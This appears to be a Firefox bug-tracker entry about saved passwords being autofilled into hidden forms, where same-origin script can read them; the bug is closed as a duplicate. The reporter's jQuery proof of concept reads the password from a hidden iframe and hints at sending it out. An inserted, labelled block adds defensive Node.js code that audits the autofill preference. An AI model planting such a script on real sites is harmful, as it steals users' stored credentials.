steal the memorized password

RESOLVED DUPLICATE of bug 534541

Status

Firefox
Security
--
major
6 years ago
4 years ago

People

(Reporter: Jaroslav Olejnik, Unassigned)

Tracking

Trunk
x86
All

Firefox Tracking Flags

(Not tracked)

Description

6 years ago
The vulnerability can steal the memorized password from the authorization form (common domain on a site with malicious code and on the site with the authorization form (same origin policy)).

Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7, Windows XP SP3 Pro

//Example in jQuery:
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript">
$(document).ready(function(){
  $('#frame').load(function(){
    var pass = $('#frame').contents().find('input[name="password"]').val();
    alert(pass); // (or send a crossdomain JSONP request)
  });
});
</script>

Comment 1

6 years ago
I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!
Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.

We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.
Group: core-security
Whiteboard: DUPEME
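
Added example, not part of the bug report or of any comment in it: a Node.js check that reads the text of a Firefox profile's prefs.js and user.js and reports whether the interim mitigation named above (signon.autofillForms set to false) is in effect. The function names and sample file contents are constructed for illustration, and the code assumes the stock default for this preference is true and that user.js overrides prefs.js.

```javascript
// Audit Firefox preference files for the signon.autofillForms mitigation.
const PREF = 'signon.autofillForms';
const FIREFOX_DEFAULT = true; // assumption: value in effect when the pref is unset

// Parse user_pref("name", value); lines into a Map; comment lines are skipped.
function parsePrefs(text) {
  const prefs = new Map();
  const re = /^\s*user_pref\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*(.+?)\s*\)\s*;/;
  for (const line of text.split(/\r?\n/)) {
    if (/^\s*(\/\/|#)/.test(line)) continue; // a commented-out pref has no effect
    const m = re.exec(line);
    if (!m) continue;
    let value;
    try { value = JSON.parse(m[2]); } catch { value = m[2]; }
    prefs.set(m[1], value);
  }
  return prefs;
}

// user.js is applied over prefs.js at startup, so it wins when both set the pref.
function auditAutofill(prefsJs, userJs) {
  const layers = [
    ['user.js', parsePrefs(userJs || '')],
    ['prefs.js', parsePrefs(prefsJs || '')],
  ];
  for (const [source, prefs] of layers) {
    if (prefs.has(PREF)) {
      const value = prefs.get(PREF);
      // Only an explicit boolean false stops autofill without user interaction.
      return { source, value, hardened: value === false };
    }
  }
  return { source: 'default', value: FIREFOX_DEFAULT, hardened: false };
}

// Constructed sample file contents (not taken from a real profile).
const samplePrefsJs = [
  '// Mozilla User Preferences',
  'user_pref("browser.startup.page", 3);',
  'user_pref("signon.autofillForms", true);',
].join('\n');
const sampleUserJs = [
  '// user_pref("signon.autofillForms", true);',
  'user_pref("signon.autofillForms", false);',
].join('\n');

console.log(auditAutofill(samplePrefsJs, sampleUserJs));
```
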

Comment 3

6 years ago
Dupe for Bug 534541?
As per comment 3.

This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 534541

Updated

4 years ago
Whiteboard: DUPEME